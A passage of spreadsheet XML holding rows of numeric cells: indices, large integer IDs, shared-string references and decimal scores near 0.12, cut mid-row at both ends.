        <v>27244</v>
      </c>
      <c r="D28350" s="2">
        <v>1.0</v>
      </c>
      <c r="E28350" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28350" s="2">
        <v>0.1206597222222223</v>
      </c>
    </row>
    <row r="28351" ht="15.75" customHeight="1">
      <c r="A28351" s="1">
        <v>19903.0</v>
      </c>
      <c r="B28351" s="2">
        <v>5.7337756E7</v>
      </c>
      <c r="C28351" s="2" t="s">
        <v>27245</v>
      </c>
      <c r="D28351" s="2">
        <v>1.0</v>
      </c>
      <c r="E28351" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28351" s="2">
        <v>0.1203703703703704</v>
      </c>
    </row>
    <row r="28352" ht="15.75" customHeight="1">
      <c r="A28352" s="1">
        <v>14076.0</v>
      </c>
      <c r="B28352" s="2">
        <v>3.7658805E7</v>
      </c>
      <c r="C28352" s="2" t="s">
        <v>27246</v>
      </c>
      <c r="D28352" s="2">
        <v>1.0</v>
      </c>
      <c r="E28352" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28352" s="2">
        <v>0.1203703703703703</v>
      </c>
    </row>
    <row r="28353" ht="15.75" customHeight="1">
      <c r="A28353" s="1">
        <v>15778.0</v>
      </c>
      <c r="B28353" s="2">
        <v>4.4188808E7</v>
      </c>
      <c r="C28353" s="2" t="s">
        <v>27247</v>
      </c>
      <c r="D28353" s="2">
        <v>1.0</v>
      </c>
      <c r="E28353" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28353" s="2">
        <v>0.1203703703703703</v>
      </c>
    </row>
    <row r="28354" ht="15.75" customHeight="1">
      <c r="A28354" s="1">
        <v>18070.0</v>
      </c>
      <c r="B28354" s="2">
        <v>5.161287E7</v>
      </c>
      <c r="C28354" s="2" t="s">
        <v>27248</v>
      </c>
      <c r="D28354" s="2">
        <v>1.0</v>
      </c>
      <c r="E28354" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28354" s="2">
        <v>0.1202321724709785</v>
      </c>
    </row>
    <row r="28355" ht="15.75" customHeight="1">
      <c r="A28355" s="1">
        <v>23803.0</v>
      </c>
      <c r="B28355" s="2">
        <v>7811973.0</v>
      </c>
      <c r="C28355" s="2" t="s">
        <v>27249</v>
      </c>
      <c r="D28355" s="2">
        <v>1.0</v>
      </c>
      <c r="E28355" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28355" s="2">
        <v>0.1202321724709785</v>
      </c>
    </row>
    <row r="28356" ht="15.75" customHeight="1">
      <c r="A28356" s="1">
        <v>558.0</v>
      </c>
      <c r="B28356" s="2">
        <v>1.8897632E7</v>
      </c>
      <c r="C28356" s="2" t="s">
        <v>27250</v>
      </c>
      <c r="D28356" s="2">
        <v>1.0</v>
      </c>
      <c r="E28356" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28356" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="28357" ht="15.75" customHeight="1">
      <c r="A28357" s="1">
        <v>2716.0</v>
      </c>
      <c r="B28357" s="2">
        <v>3.4921402E7</v>
      </c>
      <c r="C28357" s="2" t="s">
        <v>27251</v>
      </c>
      <c r="D28357" s="2">
        <v>1.0</v>
      </c>
      <c r="E28357" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28357" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="28358" ht="15.75" customHeight="1">
      <c r="A28358" s="1">
        <v>5299.0</v>
      </c>
      <c r="B28358" s="2">
        <v>4.5228088E7</v>
      </c>
      <c r="C28358" s="2" t="s">
        <v>27252</v>
      </c>
      <c r="D28358" s="2">
        <v>1.0</v>
      </c>
      <c r="E28358" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28358" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="28359" ht="15.75" customHeight="1">
      <c r="A28359" s="1">
        <v>33989.0</v>
      </c>
      <c r="B28359" s="2">
        <v>9410278.0</v>
      </c>
      <c r="C28359" s="2" t="s">
        <v>27253</v>
      </c>
      <c r="D28359" s="2">
        <v>1.0</v>
      </c>
      <c r="E28359" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28359" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="28360" ht="15.75" customHeight="1">
      <c r="A28360" s="1">
        <v>10531.0</v>
      </c>
      <c r="B28360" s="2">
        <v>1.2335043E7</v>
      </c>
      <c r="C28360" s="2" t="s">
        <v>27254</v>
      </c>
      <c r="D28360" s="2">
        <v>1.0</v>
      </c>
      <c r="E28360" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28360" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="28361" ht="15.75" customHeight="1">
      <c r="A28361" s="1">
        <v>24142.0</v>
      </c>
      <c r="B28361" s="2">
        <v>1.0065479E7</v>
      </c>
      <c r="C28361" s="2" t="s">
        <v>27255</v>
      </c>
      <c r="D28361" s="2">
        <v>1.0</v>
      </c>
      <c r="E28361" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28361" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="28362" ht="15.75" customHeight="1">
      <c r="A28362" s="1">
        <v>28454.0</v>
      </c>
      <c r="B28362" s="2">
        <v>2.6593589E7</v>
      </c>
      <c r="C28362" s="2" t="s">
        <v>27256</v>
      </c>
      <c r="D28362" s="2">
        <v>1.0</v>
      </c>
      <c r="E28362" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28362" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="28363" ht="15.75" customHeight="1">
      <c r="A28363" s="1">
        <v>4642.0</v>
      </c>
      <c r="B28363" s="2">
        <v>4.3026893E7</v>
      </c>
      <c r="C28363" s="2" t="s">
        <v>27257</v>
      </c>
      <c r="D28363" s="2">
        <v>1.0</v>
      </c>
      <c r="E28363" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28363" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="28364" ht="15.75" customHeight="1">
      <c r="A28364" s="1">
        <v>4885.0</v>
      </c>
      <c r="B28364" s="2">
        <v>4.3862844E7</v>
      </c>
      <c r="C28364" s="2" t="s">
        <v>27258</v>
      </c>
      <c r="D28364" s="2">
        <v>1.0</v>
      </c>
      <c r="E28364" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28364" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="28365" ht="15.75" customHeight="1">
      <c r="A28365" s="1">
        <v>8535.0</v>
      </c>
      <c r="B28365" s="2">
        <v>5.4104697E7</v>
      </c>
      <c r="C28365" s="2" t="s">
        <v>27259</v>
      </c>
      <c r="D28365" s="2">
        <v>1.0</v>
      </c>
      <c r="E28365" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28365" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="28366" ht="15.75" customHeight="1">
      <c r="A28366" s="1">
        <v>9654.0</v>
      </c>
      <c r="B28366" s="2">
        <v>5.6280702E7</v>
      </c>
      <c r="C28366" s="2" t="s">
        <v>27260</v>
      </c>
      <c r="D28366" s="2">
        <v>1.0</v>
      </c>
      <c r="E28366" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28366" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="28367" ht="15.75" customHeight="1">
      <c r="A28367" s="1">
        <v>19513.0</v>
      </c>
      <c r="B28367" s="2">
        <v>5.5941628E7</v>
      </c>
      <c r="C28367" s="2" t="s">
        <v>27261</v>
      </c>
      <c r="D28367" s="2">
        <v>1.0</v>
      </c>
      <c r="E28367" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28367" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="28368" ht="15.75" customHeight="1">
      <c r="A28368" s="1">
        <v>23554.0</v>
      </c>
      <c r="B28368" s="2">
        <v>6075796.0</v>
      </c>
      <c r="C28368" s="2" t="s">
        <v>27200</v>
      </c>
      <c r="D28368" s="2">
        <v>1.0</v>
      </c>
      <c r="E28368" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28368" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="28369" ht="15.75" customHeight="1">
      <c r="A28369" s="1">
        <v>23961.0</v>
      </c>
      <c r="B28369" s="2">
        <v>9012856.0</v>
      </c>
      <c r="C28369" s="2" t="s">
        <v>27262</v>
      </c>
      <c r="D28369" s="2">
        <v>1.0</v>
      </c>
      <c r="E28369" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28369" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="28370" ht="15.75" customHeight="1">
      <c r="A28370" s="1">
        <v>24733.0</v>
      </c>
      <c r="B28370" s="2">
        <v>1.1766412E7</v>
      </c>
      <c r="C28370" s="2" t="s">
        <v>27263</v>
      </c>
      <c r="D28370" s="2">
        <v>1.0</v>
      </c>
      <c r="E28370" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28370" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="28371" ht="15.75" customHeight="1">
      <c r="A28371" s="1">
        <v>33841.0</v>
      </c>
      <c r="B28371" s="2">
        <v>9012855.0</v>
      </c>
      <c r="C28371" s="2" t="s">
        <v>27262</v>
      </c>
      <c r="D28371" s="2">
        <v>1.0</v>
      </c>
      <c r="E28371" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28371" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="28372" ht="15.75" customHeight="1">
      <c r="A28372" s="1">
        <v>2627.0</v>
      </c>
      <c r="B28372" s="2">
        <v>3.4533471E7</v>
      </c>
      <c r="C28372" s="2" t="s">
        <v>27264</v>
      </c>
      <c r="D28372" s="2">
        <v>1.0</v>
      </c>
      <c r="E28372" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28372" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="28373" ht="15.75" customHeight="1">
      <c r="A28373" s="1">
        <v>2751.0</v>
      </c>
      <c r="B28373" s="2">
        <v>3.5068592E7</v>
      </c>
      <c r="C28373" s="2" t="s">
        <v>27265</v>
      </c>
      <c r="D28373" s="2">
        <v>1.0</v>
      </c>
      <c r="E28373" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28373" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="28374" ht="15.75" customHeight="1">
      <c r="A28374" s="1">
        <v>9273.0</v>
      </c>
      <c r="B28374" s="2">
        <v>5.550972E7</v>
      </c>
      <c r="C28374" s="2" t="s">
        <v>27266</v>
      </c>
      <c r="D28374" s="2">
        <v>1.0</v>
      </c>
      <c r="E28374" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28374" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="28375" ht="15.75" customHeight="1">
      <c r="A28375" s="1">
        <v>11712.0</v>
      </c>
      <c r="B28375" s="2">
        <v>2.3685353E7</v>
      </c>
      <c r="C28375" s="2" t="s">
        <v>27267</v>
      </c>
      <c r="D28375" s="2">
        <v>1.0</v>
      </c>
      <c r="E28375" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28375" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="28376" ht="15.75" customHeight="1">
      <c r="A28376" s="1">
        <v>14495.0</v>
      </c>
      <c r="B28376" s="2">
        <v>3.9632897E7</v>
      </c>
      <c r="C28376" s="2" t="s">
        <v>27268</v>
      </c>
      <c r="D28376" s="2">
        <v>1.0</v>
      </c>
      <c r="E28376" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28376" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="28377" ht="15.75" customHeight="1">
      <c r="A28377" s="1">
        <v>19629.0</v>
      </c>
      <c r="B28377" s="2">
        <v>5.6273152E7</v>
      </c>
      <c r="C28377" s="2" t="s">
        <v>27269</v>
      </c>
      <c r="D28377" s="2">
        <v>1.0</v>
      </c>
      <c r="E28377" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28377" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="28378" ht="15.75" customHeight="1">
      <c r="A28378" s="1">
        <v>24244.0</v>
      </c>
      <c r="B28378" s="2">
        <v>1.0500348E7</v>
      </c>
      <c r="C28378" s="2" t="s">
        <v>27270</v>
      </c>
      <c r="D28378" s="2">
        <v>1.0</v>
      </c>
      <c r="E28378" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28378" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="28379" ht="15.75" customHeight="1">
      <c r="A28379" s="1">
        <v>8978.0</v>
      </c>
      <c r="B28379" s="2">
        <v>5.4957178E7</v>
      </c>
      <c r="C28379" s="2" t="s">
        <v>27271</v>
      </c>
      <c r="D28379" s="2">
        <v>1.0</v>
      </c>
      <c r="E28379" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28379" s="2">
        <v>0.1195856873822976</v>
      </c>
    </row>
    <row r="28380" ht="15.75" customHeight="1">
      <c r="A28380" s="1">
        <v>6573.0</v>
      </c>
      <c r="B28380" s="2">
        <v>4.8914967E7</v>
      </c>
      <c r="C28380" s="2" t="s">
        <v>27272</v>
      </c>
      <c r="D28380" s="2">
        <v>1.0</v>
      </c>
      <c r="E28380" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28380" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="28381" ht="15.75" customHeight="1">
      <c r="A28381" s="1">
        <v>7960.0</v>
      </c>
      <c r="B28381" s="2">
        <v>5.2678329E7</v>
      </c>
      <c r="C28381" s="2" t="s">
        <v>27273</v>
      </c>
      <c r="D28381" s="2">
        <v>1.0</v>
      </c>
      <c r="E28381" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28381" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="28382" ht="15.75" customHeight="1">
      <c r="A28382" s="1">
        <v>10840.0</v>
      </c>
      <c r="B28382" s="2">
        <v>1.6046138E7</v>
      </c>
      <c r="C28382" s="2" t="s">
        <v>27274</v>
      </c>
      <c r="D28382" s="2">
        <v>1.0</v>
      </c>
      <c r="E28382" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28382" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="28383" ht="15.75" customHeight="1">
      <c r="A28383" s="1">
        <v>11796.0</v>
      </c>
      <c r="B28383" s="2">
        <v>2.4377364E7</v>
      </c>
      <c r="C28383" s="2" t="s">
        <v>27275</v>
      </c>
      <c r="D28383" s="2">
        <v>1.0</v>
      </c>
      <c r="E28383" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28383" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="28384" ht="15.75" customHeight="1">
      <c r="A28384" s="1">
        <v>20038.0</v>
      </c>
      <c r="B28384" s="2">
        <v>7337777.0</v>
      </c>
      <c r="C28384" s="2" t="s">
        <v>27276</v>
      </c>
      <c r="D28384" s="2">
        <v>1.0</v>
      </c>
      <c r="E28384" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28384" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="28385" ht="15.75" customHeight="1">
      <c r="A28385" s="1">
        <v>29228.0</v>
      </c>
      <c r="B28385" s="2">
        <v>3.0827792E7</v>
      </c>
      <c r="C28385" s="2" t="s">
        <v>27277</v>
      </c>
      <c r="D28385" s="2">
        <v>1.0</v>
      </c>
      <c r="E28385" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28385" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="28386" ht="15.75" customHeight="1">
      <c r="A28386" s="1">
        <v>30288.0</v>
      </c>
      <c r="B28386" s="2">
        <v>3.7733046E7</v>
      </c>
      <c r="C28386" s="2" t="s">
        <v>27278</v>
      </c>
      <c r="D28386" s="2">
        <v>1.0</v>
      </c>
      <c r="E28386" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28386" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="28387" ht="15.75" customHeight="1">
      <c r="A28387" s="1">
        <v>30649.0</v>
      </c>
      <c r="B28387" s="2">
        <v>4.1766704E7</v>
      </c>
      <c r="C28387" s="2" t="s">
        <v>27279</v>
      </c>
      <c r="D28387" s="2">
        <v>1.0</v>
      </c>
      <c r="E28387" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28387" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="28388" ht="15.75" customHeight="1">
      <c r="A28388" s="1">
        <v>2187.0</v>
      </c>
      <c r="B28388" s="2">
        <v>3.1883961E7</v>
      </c>
      <c r="C28388" s="2" t="s">
        <v>27280</v>
      </c>
      <c r="D28388" s="2">
        <v>1.0</v>
      </c>
      <c r="E28388" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28388" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="28389" ht="15.75" customHeight="1">
      <c r="A28389" s="1">
        <v>7437.0</v>
      </c>
      <c r="B28389" s="2">
        <v>5.1210126E7</v>
      </c>
      <c r="C28389" s="2" t="s">
        <v>27281</v>
      </c>
      <c r="D28389" s="2">
        <v>1.0</v>
      </c>
      <c r="E28389" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28389" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="28390" ht="15.75" customHeight="1">
      <c r="A28390" s="1">
        <v>19205.0</v>
      </c>
      <c r="B28390" s="2">
        <v>5.4985437E7</v>
      </c>
      <c r="C28390" s="2" t="s">
        <v>27282</v>
      </c>
      <c r="D28390" s="2">
        <v>1.0</v>
      </c>
      <c r="E28390" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28390" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="28391" ht="15.75" customHeight="1">
      <c r="A28391" s="1">
        <v>21633.0</v>
      </c>
      <c r="B28391" s="2">
        <v>2.4657324E7</v>
      </c>
      <c r="C28391" s="2" t="s">
        <v>27283</v>
      </c>
      <c r="D28391" s="2">
        <v>1.0</v>
      </c>
      <c r="E28391" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28391" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="28392" ht="15.75" customHeight="1">
      <c r="A28392" s="1">
        <v>25842.0</v>
      </c>
      <c r="B28392" s="2">
        <v>1.479516E7</v>
      </c>
      <c r="C28392" s="2" t="s">
        <v>27284</v>
      </c>
      <c r="D28392" s="2">
        <v>1.0</v>
      </c>
      <c r="E28392" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28392" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="28393" ht="15.75" customHeight="1">
      <c r="A28393" s="1">
        <v>28292.0</v>
      </c>
      <c r="B28393" s="2">
        <v>2.557532E7</v>
      </c>
      <c r="C28393" s="2" t="s">
        <v>27285</v>
      </c>
      <c r="D28393" s="2">
        <v>1.0</v>
      </c>
      <c r="E28393" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28393" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="28394" ht="15.75" customHeight="1">
      <c r="A28394" s="1">
        <v>29277.0</v>
      </c>
      <c r="B28394" s="2">
        <v>3.0994721E7</v>
      </c>
      <c r="C28394" s="2" t="s">
        <v>27286</v>
      </c>
      <c r="D28394" s="2">
        <v>1.0</v>
      </c>
      <c r="E28394" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28394" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="28395" ht="15.75" customHeight="1">
      <c r="A28395" s="1">
        <v>30710.0</v>
      </c>
      <c r="B28395" s="2">
        <v>4.3036069E7</v>
      </c>
      <c r="C28395" s="2" t="s">
        <v>27287</v>
      </c>
      <c r="D28395" s="2">
        <v>1.0</v>
      </c>
      <c r="E28395" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28395" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="28396" ht="15.75" customHeight="1">
      <c r="A28396" s="1">
        <v>2786.0</v>
      </c>
      <c r="B28396" s="2">
        <v>3.5225903E7</v>
      </c>
      <c r="C28396" s="2" t="s">
        <v>27288</v>
      </c>
      <c r="D28396" s="2">
        <v>1.0</v>
      </c>
      <c r="E28396" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28396" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="28397" ht="15.75" customHeight="1">
      <c r="A28397" s="1">
        <v>9166.0</v>
      </c>
      <c r="B28397" s="2">
        <v>5.5322809E7</v>
      </c>
      <c r="C28397" s="2" t="s">
        <v>27289</v>
      </c>
      <c r="D28397" s="2">
        <v>1.0</v>
      </c>
      <c r="E28397" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28397" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="28398" ht="15.75" customHeight="1">
      <c r="A28398" s="1">
        <v>11526.0</v>
      </c>
      <c r="B28398" s="2">
        <v>2.2448001E7</v>
      </c>
      <c r="C28398" s="2" t="s">
        <v>27290</v>
      </c>
      <c r="D28398" s="2">
        <v>1.0</v>
      </c>
      <c r="E28398" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28398" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="28399" ht="15.75" customHeight="1">
      <c r="A28399" s="1">
        <v>13392.0</v>
      </c>
      <c r="B28399" s="2">
        <v>3.4959745E7</v>
      </c>
      <c r="C28399" s="2" t="s">
        <v>27291</v>
      </c>
      <c r="D28399" s="2">
        <v>1.0</v>
      </c>
      <c r="E28399" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28399" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="28400" ht="15.75" customHeight="1">
      <c r="A28400" s="1">
        <v>13669.0</v>
      </c>
      <c r="B28400" s="2">
        <v>3.6018025E7</v>
      </c>
      <c r="C28400" s="2" t="s">
        <v>27292</v>
      </c>
      <c r="D28400" s="2">
        <v>1.0</v>
      </c>
      <c r="E28400" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28400" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="28401" ht="15.75" customHeight="1">
      <c r="A28401" s="1">
        <v>15531.0</v>
      </c>
      <c r="B28401" s="2">
        <v>4.3303727E7</v>
      </c>
      <c r="C28401" s="2" t="s">
        <v>27293</v>
      </c>
      <c r="D28401" s="2">
        <v>1.0</v>
      </c>
      <c r="E28401" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28401" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="28402" ht="15.75" customHeight="1">
      <c r="A28402" s="1">
        <v>19786.0</v>
      </c>
      <c r="B28402" s="2">
        <v>5.6805863E7</v>
      </c>
      <c r="C28402" s="2" t="s">
        <v>27294</v>
      </c>
      <c r="D28402" s="2">
        <v>1.0</v>
      </c>
      <c r="E28402" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28402" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="28403" ht="15.75" customHeight="1">
      <c r="A28403" s="1">
        <v>20758.0</v>
      </c>
      <c r="B28403" s="2">
        <v>1.4903975E7</v>
      </c>
      <c r="C28403" s="2" t="s">
        <v>27295</v>
      </c>
      <c r="D28403" s="2">
        <v>1.0</v>
      </c>
      <c r="E28403" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28403" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="28404" ht="15.75" customHeight="1">
      <c r="A28404" s="1">
        <v>33608.0</v>
      </c>
      <c r="B28404" s="2">
        <v>8341941.0</v>
      </c>
      <c r="C28404" s="2" t="s">
        <v>27296</v>
      </c>
      <c r="D28404" s="2">
        <v>1.0</v>
      </c>
      <c r="E28404" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28404" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="28405" ht="15.75" customHeight="1">
      <c r="A28405" s="1">
        <v>25558.0</v>
      </c>
      <c r="B28405" s="2">
        <v>1.4280844E7</v>
      </c>
      <c r="C28405" s="2" t="s">
        <v>27297</v>
      </c>
      <c r="D28405" s="2">
        <v>1.0</v>
      </c>
      <c r="E28405" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28405" s="2">
        <v>0.1193078324225865</v>
      </c>
    </row>
    <row r="28406" ht="15.75" customHeight="1">
      <c r="A28406" s="1">
        <v>26606.0</v>
      </c>
      <c r="B28406" s="2">
        <v>1.7988269E7</v>
      </c>
      <c r="C28406" s="2" t="s">
        <v>27298</v>
      </c>
      <c r="D28406" s="2">
        <v>1.0</v>
      </c>
      <c r="E28406" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28406" s="2">
        <v>0.1193078324225865</v>
      </c>
    </row>
    <row r="28407" ht="15.75" customHeight="1">
      <c r="A28407" s="1">
        <v>28603.0</v>
      </c>
      <c r="B28407" s="2">
        <v>2.7095458E7</v>
      </c>
      <c r="C28407" s="2" t="s">
        <v>27299</v>
      </c>
      <c r="D28407" s="2">
        <v>1.0</v>
      </c>
      <c r="E28407" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28407" s="2">
        <v>0.1193078324225865</v>
      </c>
    </row>
    <row r="28408" ht="15.75" customHeight="1">
      <c r="A28408" s="1">
        <v>32609.0</v>
      </c>
      <c r="B28408" s="2">
        <v>5826655.0</v>
      </c>
      <c r="C28408" s="2" t="s">
        <v>27300</v>
      </c>
      <c r="D28408" s="2">
        <v>1.0</v>
      </c>
      <c r="E28408" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28408" s="2">
        <v>0.1193078324225865</v>
      </c>
    </row>
    <row r="28409" ht="15.75" customHeight="1">
      <c r="A28409" s="1">
        <v>18659.0</v>
      </c>
      <c r="B28409" s="2">
        <v>5.3507663E7</v>
      </c>
      <c r="C28409" s="2" t="s">
        <v>27301</v>
      </c>
      <c r="D28409" s="2">
        <v>1.0</v>
      </c>
      <c r="E28409" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28409" s="2">
        <v>0.1191756272401434</v>
      </c>
    </row>
    <row r="28410" ht="15.75" customHeight="1">
      <c r="A28410" s="1">
        <v>16783.0</v>
      </c>
      <c r="B28410" s="2">
        <v>4.7737286E7</v>
      </c>
      <c r="C28410" s="2" t="s">
        <v>27302</v>
      </c>
      <c r="D28410" s="2">
        <v>1.0</v>
      </c>
      <c r="E28410" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28410" s="2">
        <v>0.1189236111111111</v>
      </c>
    </row>
    <row r="28411" ht="15.75" customHeight="1">
      <c r="A28411" s="1">
        <v>150.0</v>
      </c>
      <c r="B28411" s="2">
        <v>1.3639825E7</v>
      </c>
      <c r="C28411" s="2" t="s">
        <v>27303</v>
      </c>
      <c r="D28411" s="2">
        <v>1.0</v>
      </c>
      <c r="E28411" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28411" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="28412" ht="15.75" customHeight="1">
      <c r="A28412" s="1">
        <v>447.0</v>
      </c>
      <c r="B28412" s="2">
        <v>1.7134761E7</v>
      </c>
      <c r="C28412" s="2" t="s">
        <v>27304</v>
      </c>
      <c r="D28412" s="2">
        <v>1.0</v>
      </c>
      <c r="E28412" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28412" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="28413" ht="15.75" customHeight="1">
      <c r="A28413" s="1">
        <v>1435.0</v>
      </c>
      <c r="B28413" s="2">
        <v>2.6682245E7</v>
      </c>
      <c r="C28413" s="2" t="s">
        <v>27305</v>
      </c>
      <c r="D28413" s="2">
        <v>1.0</v>
      </c>
      <c r="E28413" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28413" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="28414" ht="15.75" customHeight="1">
      <c r="A28414" s="1">
        <v>1758.0</v>
      </c>
      <c r="B28414" s="2">
        <v>2.8904842E7</v>
      </c>
      <c r="C28414" s="2" t="s">
        <v>27306</v>
      </c>
      <c r="D28414" s="2">
        <v>1.0</v>
      </c>
      <c r="E28414" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28414" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="28415" ht="15.75" customHeight="1">
      <c r="A28415" s="1">
        <v>2956.0</v>
      </c>
      <c r="B28415" s="2">
        <v>3.6018085E7</v>
      </c>
      <c r="C28415" s="2" t="s">
        <v>27307</v>
      </c>
      <c r="D28415" s="2">
        <v>1.0</v>
      </c>
      <c r="E28415" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28415" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="28416" ht="15.75" customHeight="1">
      <c r="A28416" s="1">
        <v>3804.0</v>
      </c>
      <c r="B28416" s="2">
        <v>4.0016258E7</v>
      </c>
      <c r="C28416" s="2" t="s">
        <v>27308</v>
      </c>
      <c r="D28416" s="2">
        <v>1.0</v>
      </c>
      <c r="E28416" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28416" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="28417" ht="15.75" customHeight="1">
      <c r="A28417" s="1">
        <v>7243.0</v>
      </c>
      <c r="B28417" s="2">
        <v>5.069489E7</v>
      </c>
      <c r="C28417" s="2" t="s">
        <v>27309</v>
      </c>
